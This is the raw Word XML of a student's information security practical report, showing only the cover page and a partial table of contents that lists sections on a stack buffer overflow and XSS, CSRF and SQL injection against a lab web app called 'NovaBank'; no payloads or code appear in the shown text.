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B92C74" w14:textId="77777777" w:rsidR="00F7607E" w:rsidRDefault="00F7607E" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34BDC195" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7FB980" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5199A901" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A126CB6" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779C6931" w14:textId="467C69BF" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F0E180" w14:textId="1907C44B" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Practical Assignment Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AEEEB7" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A6A48F" w14:textId="0103E1F0" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Stack Buffer Overflow   |   Web Application Security   |   Red Team Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B642B83" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71673CFA" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F7E0DE3" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="542D2661" w14:textId="63263B7E" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Name: Hadi Wasim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43345861" w14:textId="77BDF204" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Student ID: </w:t>
      </w:r>
      <w:r w:rsidR="00796CD7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>23F-0681</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E06883" w14:textId="6A6520B3" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Course: </w:t>
      </w:r>
      <w:r w:rsidR="00796CD7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Information Security BCS 7A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DD47E7" w14:textId="6F8FE206" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Date: 1</w:t>
      </w:r>
      <w:r w:rsidR="00796CD7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> October 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC90E57" w14:textId="1E380AC2" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="670169AC" w14:textId="3C3FEA57" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BDC289" w14:textId="6539A7E7" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \o "1-2" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Part 1 - Stack-Based Buffer Overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551116 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DCFFE0" w14:textId="2E169651" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.1  Objective</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551117 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="265102D4" w14:textId="6EA8B795" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.2  Why the program is vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551118 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE63950" w14:textId="2B0EBA46" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.3  Stack layout and payload design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551119 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="773171AC" w14:textId="58E2E157" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.4  Disabling protections (lab only)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551120 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE2DBDB" w14:textId="739C90E9" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.5  Execution and proof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551121 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20192A84" w14:textId="656E9E7D" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.6  Defences</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551122 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0080C826" w14:textId="5AB9C38B" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.7  Note on the brief</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551123 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="678B0423" w14:textId="56C105F8" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Part 2 - Web Application Security (NovaBank)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551124 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2AA49B" w14:textId="44A9685D" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.1  Overview</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551125 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF9B736" w14:textId="00441B84" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.2  Cross-Site Scripting - Reflected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551126 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF6517B" w14:textId="6BFB7F77" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.3  Cross-Site Scripting - Stored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551127 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A0C4BB" w14:textId="3EC9B06A" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.4  Cross-Site Scripting - DOM-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551128 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA82D1A" w14:textId="3B254ADC" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.5  Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551129 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D6F8E3" w14:textId="73E98697" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.6  SQL Injection - Easy (authentication bypass)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551130 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D171060" w14:textId="224C0583" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.7  SQL Injection - Intermediate (blind, boolean-based)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551131 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DC3301" w14:textId="0A90CE91" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.8  SQL Injection - Advanced (UNION-based extraction)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551132 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D7838" w14:textId="7A17ADAC" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
